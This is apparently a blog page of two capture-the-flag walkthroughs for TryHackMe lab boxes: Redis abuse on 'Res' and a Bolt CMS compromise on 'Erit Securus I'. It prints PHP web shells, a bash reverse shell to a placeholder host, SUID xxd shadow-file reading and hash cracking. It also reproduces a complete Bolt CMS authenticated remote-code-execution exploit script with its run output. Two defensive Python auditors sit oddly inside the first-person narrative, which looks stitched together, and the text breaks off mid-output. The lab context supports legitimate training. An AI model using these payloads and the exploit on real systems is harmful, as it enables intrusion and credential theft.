  • TryHackMe Res Redis pentesting Walkthrough

     

     


    The platform develops virtual classrooms that not only allow users to deploy training environments with the click of a button, but also reinforce learning by adding a question-answer approach. It's a comfortable experience to learn using pre-designed courses which include virtual machines (VMs) hosted in the cloud.


    While using a question-answer model does make learning easier, TryHackMe allows users to create their own virtual classrooms to teach particular topics enabling them to become teachers. This not only provides other users with rich and varied content, but also helps creators reinforce their understanding of fundamental concepts.
      



    Res is a new box on TryHackMe where you have to hack into a vulnerable database server with an in-memory data structure in this semi-guided challenge!


    Let's start off by scanning all ports using Nmap:


     

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~]
    └─$ sudo nmap -A -T4 -Pn  -sV -p- 10.10.43.113                                          130 ⨯
    [sudo] password for hackerboy: 
    Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
    Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-26 23:32 IST
    Nmap scan report for 10.10.43.113
    Host is up (0.22s latency).
    Not shown: 65533 closed ports
    PORT     STATE SERVICE VERSION
    80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
    |_http-server-header: Apache/2.4.18 (Ubuntu)
    |_http-title: Apache2 Ubuntu Default Page: It works
    6379/tcp open  redis   Redis key-value store 6.0.7
    No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
    TCP/IP fingerprint:
    OS:SCAN(V=7.91%E=4%D=1/26%OT=80%CT=1%CU=44172%PV=Y%DS=2%DC=T%G=Y%TM=60105BB
    OS:D%P=x86_64-pc-linux-gnu)SEQ(SP=100%GCD=1%ISR=105%TI=Z%CI=I%II=I%TS=8)OPS
    OS:(O1=M505ST11NW7%O2=M505ST11NW7%O3=M505NNT11NW7%O4=M505ST11NW7%O5=M505ST1
    OS:1NW7%O6=M505ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN
    OS:(R=Y%DF=Y%T=40%W=6903%O=M505NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
    OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
    OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
    OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
    OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
    OS:=S)
    
    Network Distance: 2 hops
    
    TRACEROUTE (using port 23/tcp)
    HOP RTT       ADDRESS
    1   224.93 ms 10.8.0.1
    2   225.08 ms 10.10.43.113
    
    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 626.03 seconds
                                                                                                  
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~]
    └─$ 
    
    
    






     

    Looking at the results we have an Apache web server running on port 80 and Redis 6.0.7, an in-memory data structure store, running on port 6379.


    Port 80: Apache Web Server:

    Let’s checkout the web server on port 80:

     

     

     


     

     

    OK, so we have the standard Apache landing page. Looking at the source code we can see nothing hidden. I ran a directory scan using Dirsearch to see whether I could find any hidden directories. Unfortunately no hidden directories can be found. Time to move on to port 6379 and enumerate Redis.

     

    Redis is not something I am familiar with so I spent some time Googling and found a good blog on enumerating Redis as below: 

     

     


     





    To start with we need to download redis-tools, so we can have access to redis-cli:

    sudo apt-get install redis-tools



    To connect to the target with redis-cli, from the command line we enter:

    redis-cli -h [IP ADDRESS]


    By default Redis can be accessed without credentials. However, it can be configured to require only a password, or a username and password. In our case Redis can be accessed without any credentials. We can check this simply by entering the ‘info’ command.


     

     

    [screenshot: output of the redis-cli info command]

     

     

    From the above we can see that we have a potential username: vianka. From the Hack Tricks website we can see that we can gain RCE as follows:




    [screenshot: the redis-cli commands from the Hack Tricks write-up]

     

     

    In firefox we can navigate to [IP-ADDRESS]/redis.php:

     




     



    We can see that redis.php does indeed run phpinfo().

    Let’s try this with another php script to run commands:


    <?php system($_GET['cmd']); ?>



    In redis-cli, we can simply overwrite the previous php file with this code and try RCE. 
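The two steps above (connecting without credentials, then using CONFIG to point the dump directory at the web root) each depend on a Redis setting. As an added, defensive example that is not code from the walkthrough or from Redis itself, the following Python script audits a redis.conf for exactly those settings: no requirepass, protected-mode off, a bind on all interfaces, CONFIG left callable, and a dump directory under a web document root. Both sample configurations are constructed for the example, and the requirepass value is a placeholder.

```python
# Constructed sample: an exposed configuration of the kind the walkthrough
# finds (no password, reachable from the network, CONFIG usable, dumps
# written under the web root). Not taken from the box.
WEAK_CONF = """\
bind 0.0.0.0
protected-mode no
port 6379
# requirepass foobared
dir /var/www/html
"""

# Constructed sample: the same instance with the exposure closed. The
# requirepass value is a placeholder; use a long random secret.
HARDENED_CONF = """\
bind 127.0.0.1
protected-mode yes
port 6379
requirepass "REPLACE-WITH-LONG-RANDOM-SECRET"
rename-command CONFIG ""
rename-command FLUSHALL ""
dir /var/lib/redis
"""


def parse_conf(text):
    """Map each directive to the list of values seen (some directives repeat)."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue  # comments and blank lines carry no setting
        parts = line.split(None, 1)
        key = parts[0].lower()
        value = parts[1].strip() if len(parts) > 1 else ""
        conf.setdefault(key, []).append(value)
    return conf


def audit(text):
    """Return a list of findings; an empty list means nothing was flagged."""
    conf = parse_conf(text)
    findings = []

    # Without a bind directive Redis listens on every interface.
    binds = conf.get("bind", [])
    if not binds or any(tok in ("0.0.0.0", "*", "::") for b in binds for tok in b.split()):
        findings.append("bind: listens on all interfaces")

    if conf.get("protected-mode", ["yes"])[0].lower() != "yes":
        findings.append("protected-mode: disabled")

    if "requirepass" not in conf:
        findings.append("requirepass: not set, unauthenticated access")

    # rename-command <old> "" disables a command; CONFIG is the one abused above.
    renamed = {v.split()[0].upper() for v in conf.get("rename-command", []) if v}
    if "CONFIG" not in renamed:
        findings.append("rename-command: CONFIG reachable, dir/dbfilename changeable at runtime")

    dump_dir = conf.get("dir", [""])[0].strip('"')
    if dump_dir.startswith(("/var/www", "/srv/http", "/usr/share/nginx")):
        findings.append("dir: dump directory is under a web document root")

    return findings


if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit(conf) or ["ok"])
```

On a real host, replace the constants with the text of /etc/redis/redis.conf. Redis 6 can also authenticate through ACL rules (the `user` directive) instead of requirepass; the check above only looks at requirepass, so extend it if your deployment relies on ACLs.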



     


     

     

    Let’s see if we can print out the contents of the passwd file on the Linux machine, it is best to change to ‘view-source’ to see the output:


     

     


     

     

     

    And there we go, we have the full contents of the /etc/passwd file on the screen, and again we can see that we have a user vianka. All we need to do now is set up a listener and create a script to run a simple PHP reverse shell.

    To do this I will do the same as above in redis-cli, but this time the key test will be set to the following PHP reverse shell script.



    "<?php exec("/bin/bash -c 'bash -i > /dev/tcp/YOUR_IP/4444 0>&1'"); ?>"




    One important point here is that we will need to escape the set test “….” quotes from the php shell script, so we will need to modify our shell code as follows:




    [screenshot: the set command with the escaped PHP reverse shell]


     

    To capture the reverse shell I will start a Pwncat listener, as it has a great deal of functionality, a bit like meterpreter, in that we can easily upload and download files for further enumeration of the system, as well as run the built-in privesc scripts. 

     

     

     


     

     

    And we are in as user www-data. In the /home directory we can see user Vianka. Moving to Vianka’s home directory we can see that we have read access to the user.flag, so we can read the flag. 

     

     

     


     

     

     


     

     

    A quick aside: at this point I could not clear my terminal. If the same happens to you, don't worry; typing this command will let you clear it:

     

    export TERM=xterm 

     



    [screenshot: enumeration result]


     

     

    The result shows a binary, xxd, with the SUID bit set and owned by root. We can probably exploit this to read a file with full root privileges. The go-to choice for Linux binary exploits is GTFOBins.

     



     


    [screenshot: xxd entry, provided by GTFOBins]

     

     

     

    All files with the SUID permission set can be found with this command:


    find / -perm -u=s -type f 2>/dev/null
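The same listing is what a defender compares against a known-good baseline. The following Python script is an added example, not code from the walkthrough: it takes output in the format the find command above produces, subtracts a baseline of SUID binaries the distribution ships, and annotates whatever is left. The baseline and the sample find output are constructed for the example; a real baseline is taken from a clean install of the same image.

```python
# Constructed baseline: SUID binaries typically shipped on an Ubuntu 16.04
# system. An assumption for the example; build a real one from a clean
# install (find / -perm -u=s -type f | sort > baseline.txt).
BASELINE = {
    "/bin/su", "/bin/mount", "/bin/umount", "/bin/ping", "/bin/ping6",
    "/bin/fusermount", "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/chsh",
    "/usr/bin/chfn", "/usr/bin/gpasswd", "/usr/bin/newgrp",
    "/usr/lib/openssh/ssh-keysign", "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
}

# Constructed sample of what the find command prints on a host like the one
# in the walkthrough (xxd is the extra entry; the /tmp path is a second
# constructed oddity).
SAMPLE_FIND_OUTPUT = """\
/bin/su
/bin/mount
/bin/umount
/bin/ping
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/xxd
/usr/lib/openssh/ssh-keysign
/tmp/.x/helper
"""

# Tools whose normal function (read or write arbitrary files, spawn a shell)
# becomes a privilege escalation when they are SUID root.
GENERAL_PURPOSE = {"xxd", "vim", "vi", "find", "python", "python3", "perl",
                   "bash", "sh", "cp", "mv", "tar", "less", "more", "awk"}


def parse_find_output(text):
    """One absolute path per line; blank lines are ignored."""
    return [line.strip() for line in text.splitlines() if line.strip()]


def unexpected_suid(paths, baseline=BASELINE):
    """SUID paths not in the baseline, sorted for stable reporting."""
    return sorted(set(paths) - set(baseline))


def risk_notes(paths):
    """Attach a reason to each unexpected path using simple heuristics."""
    notes = {}
    for path in paths:
        reasons = []
        if not path.startswith(("/bin/", "/sbin/", "/usr/")):
            reasons.append("outside the standard binary directories")
        if "/." in path:
            reasons.append("hidden path component")
        if path.rsplit("/", 1)[-1] in GENERAL_PURPOSE:
            reasons.append("general-purpose tool; reads or writes files as the file owner")
        notes[path] = reasons or ["not in baseline"]
    return notes


def report(text, baseline=BASELINE):
    """Full pipeline: parse, diff against the baseline, annotate."""
    return risk_notes(unexpected_suid(parse_find_output(text), baseline))


if __name__ == "__main__":
    for path, reasons in report(SAMPLE_FIND_OUTPUT).items():
        print(path, "->", "; ".join(reasons))
```

Run it periodically (or from a file-integrity job) and the xxd entry stands out immediately, which is the check that would have caught this box's escalation path before anyone needed GTFOBins.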

     





     

     

    Unfortunately we do not have sudo rights, but looking at the info we can read a file as root, as the file has the SUID bit set. It may be possible to read the shadow file, extract the hash for user vianka, and see if we can brute force the hash to get the password.

     

     


     

     

     

    Using this exploit we can print out the contents of the shadow file and copy Vianka's hash. If I can brute force the hash using John we can simply su to user Vianka.

     

     


     

     

     

     

    Brute Forcing Vianka’s Hash with John:

    To do this we need to create two files, one with the contents of the passwd file and one with the hash of the shadow file, we only need to copy and paste the information for user Vianka. We can then use the ‘unshadow’ command to convert the hash to a format that is readable by John.

     


    echo "content" > local_shadow

    echo "content" > local_passwd

    unshadow local_passwd local_shadow > hash.txt


     

     


     

     

    john --format=sha512crypt --wordlist=/home/hackerboy/Documents/rockyou.txt hash.txt

     

     

     


     

     

     

    Now we have the password for user vianka, so we can simply run 'su vianka' to change user to vianka:

     


     



     

     


     

     

     

    And there we have it, the root.txt file is there for the taking. I really enjoyed this box and it was good to learn about Redis, something I had not come across before.

     

     

     

    Disclaimer

    All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. They do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.



      - Hacking Truth by Kumar Atul Jaiswal


     

  • TryHackMe Erit Securus I

     

     

      



     



    Let's Start 

     

    We can run a simple Nmap scan to look for open ports and services:



     


    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/erit-tryhackme]
    └─$ sudo nmap -A -T4 -Pn  -sV -vv  10.10.108.118                                                    
    [sudo] password for hackerboy: 
    Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
    Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-26 16:05 IST
    NSE: Loaded 153 scripts for scanning.
    Initiating NSE at 16:05
    Completed NSE at 16:05, 0.00s elapsed
    Scanning 10.10.108.118 [1000 ports]
    Discovered open port 22/tcp on 10.10.108.118
    Discovered open port 80/tcp on 10.10.108.118
    Completed SYN Stealth Scan at 16:05, 6.47s elapsed (1000 total ports)
    Retrying OS detection (try #3) against 10.10.108.118
    Completed NSE at 16:05, 0.00s elapsed
    Nmap scan report for 10.10.108.118
    Host is up, received user-set (0.23s latency).
    Scanned at 2021-05-26 16:05:04 IST for 49s
    Not shown: 998 closed ports
    Reason: 998 resets
    PORT   STATE SERVICE REASON         VERSION
    22/tcp open  ssh     syn-ack ttl 63 OpenSSH 6.7p1 Debian 5+deb8u8 (protocol 2.0)
    | ssh-hostkey: 
    |   1024 b1:ac:a9:92:d3:2a:69:91:68:b4:6a:ac:45:43:fb:ed (DSA)
    | ssh-dss AAAAB3NzaC1kc3MAAACBAPWmD4IaPbJQU46GEKX8pUal0IbZzIykktEuUh5boCKMuwsetNGanzNZYFd6eGWRd+zqr6nRnRFQPDiDZtt6DDz7NcJcXliGifQehWEEmskzfhdGSuh+kBUQaqXskCKZi0U/l9P0kvP6bD2SdsXqiYTBGQxN6a4Do1fyE2OoVYgPAAAAFQD4r+hmmsHGFfn0SV1mjGpoHpFwuwAAAIAnnoGwYiWDRAwFoPLkLYWahNwCbLAhVXOb1cnr8NxZN+uRMqEdtoZHNUbTd7ki8j5WpkZhMjFEyZQJg+MNQjUSxISlE1SoBTI8BmAUDAEvgPNyr0CDCS42rAY98JTMhaoZ8FOzgoatLmJWWgWqM+8YHCN4XHoVgm1vMagLsWxW5AAAAIBGW3tnTGis3+eWROnisRfyoo3zawOnd7oijjK7CAiIuxfqc3ESTzeLlkL0QBAIv/1PBGoZSTwg53aZqctO2/BgSNGMWDts3xnqpsEGNyo520Br/cBUyi6rRBotV1kL9tIT4VwdP33F/bjiHHRclfCmOtVYWmkst+HUSqS2yPn1WQ==
    |   2048 3a:3f:9f:59:29:c8:20:d7:3a:c5:04:aa:82:36:68:3f (RSA)
    | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC0zYWd7C1JANU5TctI7lB/tyS9Aid6x5Dh2PnD7fpz6C9Apv9Y/YJzaCUYgqME41ZDxIIiegV02OSCkKFmXvr9gVVKaFHyUVhQ9Zb3FyQeGgWEL3004HIL+G06afXPlsRzNBb5VoqUte+5bigJT5UkyncAfWn+8bWLnFmuXDi5PZ4Pz0RHx9HzCwJ5G26DogQUI6M0zQkhJHzD+nWdIExvoY1L9UN4oZzCuaUF3Tcel3dDnbgi1RaZlfFi3r5NNUtQ7OVijWnms7nYNN7b77CZZWMhE6yMYI8+3ya99CfzA/oYsHv+t8XSbRyAdm5KvETrD8yoBrE14F2FekQQNggx
    |   256 f9:2f:bb:e3:ab:95:ee:9e:78:7c:91:18:7d:95:84:ab (ECDSA)
    | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAOH4ypeTzhthRbvcrzqVbbWXG1imFdejEQIo53fimAkjsOcrmEDWwT7Lskm5qyz4dmhGmfsH90xzOgQ+Bm6Nuk=
    |   256 49:0e:6f:cb:ec:6c:a5:97:67:cc:3c:31:ad:94:a4:54 (ED25519)
    |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIK7iJO0KhscqLrJgy+mvB3Y+5U+WpOiBAxCr4TKu7pJB
    80/tcp open  http    syn-ack ttl 63 nginx 1.6.2
    |_http-generator: Bolt
    | http-methods: 
    |_  Supported Methods: GET HEAD POST OPTIONS
    |_http-server-header: nginx/1.6.2
    |_http-title: Graece donan, Latine voluptatem vocant. | Erit Securus 1
    No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
    TCP/IP fingerprint:
    OS:SCAN(V=7.91%E=4%D=5/26%OT=22%CT=1%CU=33880%PV=Y%DS=2%DC=T%G=Y%TM=60AE248
    OS:9%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=109%TI=Z%CI=I%II=I%TS=8)OPS
    OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
    OS:=S)
    
    Uptime guess: 0.043 days (since Wed May 26 15:03:51 2021)
    Network Distance: 2 hops
    TCP Sequence Prediction: Difficulty=259 (Good luck!)
    IP ID Sequence Generation: All zeros
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    
    TRACEROUTE (using port 993/tcp)
    HOP RTT       ADDRESS
    1   264.29 ms 10.8.0.1
    2   264.52 ms 10.10.108.118
    
    NSE: Script Post-scanning.
    Read data files from: /usr/bin/../share/nmap
    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 50.48 seconds
               Raw packets sent: 1306 (61.562KB) | Rcvd: 1134 (56.636KB)
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/erit-tryhackme]
    └─$ 
    
    
    

     

     

    From this result:

     

    port 22/tcp - SSH (openSSH 6.7p1)

    port 80/tcp - HTTP (nginx 1.6.2)

     

     

    Enumeration 


    Examine the web server and identify what web app is running. The content management system the website is built on can be found in the http-generator field of the Nmap scan. It can also be determined by viewing the website in the browser and scrolling to the bottom of the page:


     







    Exploit 


    Download the exploit for this app. The exploit works, but might not fire every time. If at first you don't succeed...


    CVE - Exploit 







     

    The exploit requires authentication, which means we will require a username and password to proceed. We could attempt to brute force this, but these credentials can be easily guessed using a few simple username/password combinations on the login page.





    # Exploit Title: Bolt CMS 3.7.0 - Authenticated Remote Code Execution
    # Date: 2020-04-05
    # Exploit Author: r3m0t3nu11
    # Vendor Homepage: https://bolt.cm/
    # Software Link: https://bolt.cm/
    # Version: up to date and 6.x
    # Tested on: Linux
    # CVE : not-yet-0day
    
    #!/usr/bin/python
    
    import requests
    import sys
    import warnings
    import re
    import os
    from bs4 import BeautifulSoup
    from colorama import init 
    from termcolor import colored 
      
    init() 
    #pip install -r requirements.txt
    print(colored('''
     ▄▄▄▄▄▄▄▄▄▄   ▄▄▄▄▄▄▄▄▄▄▄  ▄       ▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▄▄▄▄▄  ▄▄       ▄▄  ▄▄▄▄▄▄▄▄▄▄▄      
    ▐░░░░░░░░░░▌ ▐░░░░░░░░░░░▌▐░▌     ▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░▌     ▐░░▌▐░░░░░░░░░░░▌     
    ▐░█▀▀▀▀▀▀▀█░▌▐░█▀▀▀▀▀▀▀█░▌▐░▌      ▀▀▀▀█░█▀▀▀▀ ▐░█▀▀▀▀▀▀▀▀▀ ▐░▌░▌   ▐░▐░▌▐░█▀▀▀▀▀▀▀▀▀      
    ▐░▌       ▐░▌▐░▌       ▐░▌▐░▌          ▐░▌     ▐░▌          ▐░▌▐░▌ ▐░▌▐░▌▐░▌               
    ▐░█▄▄▄▄▄▄▄█░▌▐░▌       ▐░▌▐░▌          ▐░▌     ▐░▌          ▐░▌ ▐░▐░▌ ▐░▌▐░█▄▄▄▄▄▄▄▄▄      
    ▐░░░░░░░░░░▌ ▐░▌       ▐░▌▐░▌          ▐░▌     ▐░▌          ▐░▌  ▐░▌  ▐░▌▐░░░░░░░░░░░▌     
    ▐░█▀▀▀▀▀▀▀█░▌▐░▌       ▐░▌▐░▌          ▐░▌     ▐░▌          ▐░▌   ▀   ▐░▌ ▀▀▀▀▀▀▀▀▀█░▌ 
    ▐░▌       ▐░▌▐░▌       ▐░▌▐░▌          ▐░▌     ▐░▌          ▐░▌       ▐░▌          ▐░ 
    ▐░█▄▄▄▄▄▄▄█░▌▐░█▄▄▄▄▄▄▄█░▌▐░█▄▄▄▄▄▄▄▄▄ ▐░▌     ▐░█▄▄▄▄▄▄▄▄▄ ▐░▌       ▐░▌ ▄▄▄▄▄▄▄▄▄█░▌
    ▐░░░░░░░░░░▌ ▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░▌     ▐░░░░░░░░░░░▌▐░▌       ▐░▌▐░░░░░░░░░░░▌
     ▀▀▀▀▀▀▀▀▀▀   ▀▀▀▀▀▀▀▀▀▀▀  ▀▀▀▀▀▀▀▀▀▀▀  ▀       ▀▀▀▀▀▀▀▀▀▀▀  ▀         ▀  ▀▀▀▀▀▀▀▀▀▀▀
    
    Pre Auth rce with low credintanl
    #Zero-way By @r3m0t3nu11 speical thanks to @dracula @Mr_Hex''',"blue"))
    
    
    
    if len(sys.argv) != 4:
        print((len(sys.argv)))
        print((colored("[~] Usage : ./bolt.py url username password","red")))
        exit()
    url = sys.argv[1]
    username = sys.argv[2]
    password = sys.argv[3]
    
    
    
    request = requests.session()
    print((colored("[+] Retrieving CSRF token to submit the login form","green")))
    page = request.get(url+"/bolt/login")
    html_content = page.text
    soup = BeautifulSoup(html_content, 'html.parser')
    token = soup.findAll('input')[2].get("value")
    
    login_info = {
        "user_login[username]": username,
        "user_login[password]": password,
        "user_login[login]": "",
         "user_login[_token]": token
       }
    
    login_request = request.post(url+"/bolt/login", login_info)
    print((colored("[+] Login token is : {0}","green")).format(token))
    
    
    
    aaa = request.get(url+"/bolt/profile")
    soup0 = BeautifulSoup(aaa.content, 'html.parser')
    token0 = soup0.findAll('input')[6].get("value")
    data_profile = { 
    	"user_profile[password][first]":"password",
    	"user_profile[password][second]":"password",
    	"user_profile[email]":"a@a.com",
    	"user_profile[displayname]":"",
    	"user_profile[save]":"",
    	"user_profile[_token]":token0
    
    		}
    profile = request.post(url+'/bolt/profile',data_profile)
    
    
    
    
    cache_csrf = request.get(url+"/bolt/overview/showcases")
    
    soup1 = BeautifulSoup(cache_csrf.text, 'html.parser')
    csrf = soup1.findAll('div')[12].get("data-bolt_csrf_token")
    
    
    asyncc = request.get(url+"/async/browse/cache/.sessions?multiselect=true")
    soup2 = BeautifulSoup(asyncc.text, 'html.parser')
    tables = soup2.find_all('span', class_ = 'entry disabled')
    
    
    print((colored("[+] SESSION INJECTION ","green")))
    for all_tables in tables: 
    	
    	f= open("session.txt","a+")
    	f.write(all_tables.text+"\n")
    	f.close()
    	num_lines = sum(1 for line in open('session.txt'))
    	
    	renamePostData = {
    		"namespace": "root",
    		"parent": "/app/cache/.sessions",
    		"oldname": all_tables.text,
    		"newname": "../../../public/files/test{}.php".format(num_lines),
    		"token": csrf
    	   }
    	rename = request.post(url+"/async/folder/rename", renamePostData)
    	
    
    
    
    	try:
    		url1 = url+'/files/test{}.php?test=ls%20-la'.format(num_lines)
    
    		rev = requests.get(url1).text
    		r1 = re.findall('php',rev)
    		
    		r2 = r1[0]
    		if r2 == "php" : 
    			fileINJ = "test{}".format(num_lines)
    			
    
    
    			print((colored("[+] FOUND  : "+fileINJ,"green")))
    		
    	except IndexError:
    		print((colored("[-] Not found.","red")))
    
    new_name = 0
    while new_name != 'quit':
    	inputs = input(colored("Enter OS command , for exit 'quit' : ","green","on_red"))
    	if inputs == "quit" :
    		exit()
    	else:
    		a = requests.get(url+"/files/{}.php?test={}".format(fileINJ,inputs))
    		aa = a.text
    		r11 = re.findall('...displayname";s:..:"([\w\s\W]+)',aa)
    
    
    		print((r11)[0])
                
    
    
    
      
      

     

     

    If you want, you can rename the exploit file first:





    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/erit]
    └─$ ls
    48296.py
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/erit]
    └─$ sudo cp 48296.py  exploit.py               
    [sudo] password for hackerboy: 
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/erit]
    └─$ ls
    48296.py  exploit.py
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/erit]
    └─$ 
    
    
      
      



     

    Gaining access


    We are ready to run the exploit script against the target:


    sudo python3 exploit.py http://<target IP> admin password

     



      
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/erit]
    └─$ sudo python3 exploit.py http://10.10.108.118 admin password
    
     ▄▄▄▄▄▄▄▄▄▄   ▄▄▄▄▄▄▄▄▄▄▄  ▄       ▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▄▄▄▄▄  ▄▄       ▄▄  ▄▄▄▄▄▄▄▄▄▄▄      
    ▐░░░░░░░░░░▌ ▐░░░░░░░░░░░▌▐░▌     ▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░▌     ▐░░▌▐░░░░░░░░░░░▌     
    ▐░█▀▀▀▀▀▀▀█░▌▐░█▀▀▀▀▀▀▀█░▌▐░▌      ▀▀▀▀█░█▀▀▀▀ ▐░█▀▀▀▀▀▀▀▀▀ ▐░▌░▌   ▐░▐░▌▐░█▀▀▀▀▀▀▀▀▀      
    ▐░▌       ▐░▌▐░▌       ▐░▌▐░▌          ▐░▌     ▐░▌          ▐░▌▐░▌ ▐░▌▐░▌▐░▌               
    ▐░█▄▄▄▄▄▄▄█░▌▐░▌       ▐░▌▐░▌          ▐░▌     ▐░▌          ▐░▌ ▐░▐░▌ ▐░▌▐░█▄▄▄▄▄▄▄▄▄      
    ▐░░░░░░░░░░▌ ▐░▌       ▐░▌▐░▌          ▐░▌     ▐░▌          ▐░▌  ▐░▌  ▐░▌▐░░░░░░░░░░░▌     
    ▐░█▀▀▀▀▀▀▀█░▌▐░▌       ▐░▌▐░▌          ▐░▌     ▐░▌          ▐░▌   ▀   ▐░▌ ▀▀▀▀▀▀▀▀▀█░▌ 
    ▐░▌       ▐░▌▐░▌       ▐░▌▐░▌          ▐░▌     ▐░▌          ▐░▌       ▐░▌          ▐░ 
    ▐░█▄▄▄▄▄▄▄█░▌▐░█▄▄▄▄▄▄▄█░▌▐░█▄▄▄▄▄▄▄▄▄ ▐░▌     ▐░█▄▄▄▄▄▄▄▄▄ ▐░▌       ▐░▌ ▄▄▄▄▄▄▄▄▄█░▌
    ▐░░░░░░░░░░▌ ▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░▌     ▐░░░░░░░░░░░▌▐░▌       ▐░▌▐░░░░░░░░░░░▌
     ▀▀▀▀▀▀▀▀▀▀   ▀▀▀▀▀▀▀▀▀▀▀  ▀▀▀▀▀▀▀▀▀▀▀  ▀       ▀▀▀▀▀▀▀▀▀▀▀  ▀         ▀  ▀▀▀▀▀▀▀▀▀▀▀
    
    Pre Auth rce with low credintanl
    #Zero-way By @r3m0t3nu11 speical thanks to @dracula @Mr_Hex
    [+] Retrieving CSRF token to submit the login form
    [+] Login token is : _AJfPiYG9NweZWcPHp4VBBTPffsYer938Wn9Dad6qho
    [+] SESSION INJECTION 
    [-] Not found.
    [-] Not found.
    [-] Not found.
    [-] Not found.
    [+] FOUND  : test5
    [-] Not found.
    [-] Not found.
    [-] Not found.
    [-] Not found.
    [-] Not found.
    [-] Not found.
    [-] Not found.
    [-] Not found.
    [-] Not found.
    [+] FOUND  : test15
    [-] Not found.
    Enter OS command , for exit 'quit' : 
                                                                          
      






    Now we have access, we can create a simple PHP shell on the server:


    echo '<?php system($_GET["cmd"]);?>'>cmd.php






    [-] Not found.
    [-] Not found.
    [+] FOUND  : test15
    [-] Not found.
    Enter OS command , for exit 'quit' : id
    uid=33(www-data) gid=33(www-data) groups=33(www-data)                                                                                           
    ";s:8:"*stack";a:0:{}s:10:"*enabled";i:1;s:17:"*shadowpassword";N;s:14:"*shadowtoken";N;s:17:"*shadowvalidity";N;s:15:"*failedlogins";i:0;s:17:"*throttleduntil";N;s:8:"*roles";a:2:{i:0;s:4:"root";i:1;s:8:"everyone";}s:7:"_fields";a:0:{}s:42:"Bolt\Storage\Entity\Entity_specialFields";a:2:{i:0;s:3:"app";i:1;s:6:"values";}s:7:"*_app";N;s:12:"*_internal";a:1:{i:0;s:11:"contenttype";}}s:8:"*token";O:29:"Bolt\Storage\Entity\Authtoken":12:{s:5:"*id";s:1:"3";s:10:"*user_id";i:1;s:8:"*token";s:64:"34e3f69a6fc2261d519381fba1f6b235abc31e4c27f7df4e2559812eaadd53fc";s:7:"*salt";s:32:"d34f9accf4805f6d1eb98f5d698722af";s:11:"*lastseen";O:13:"Carbon\Carbon":3:{s:4:"date";s:26:"2020-04-25 12:32:10.117842";s:13:"timezone_type";i:3;s:8:"timezone";s:3:"UTC";}s:5:"*ip";s:10:"172.17.0.1";s:12:"*useragent";s:22:"python-requests/2.23.0";s:11:"*validity";O:13:"Carbon\Carbon":3:{s:4:"date";s:26:"2020-05-09 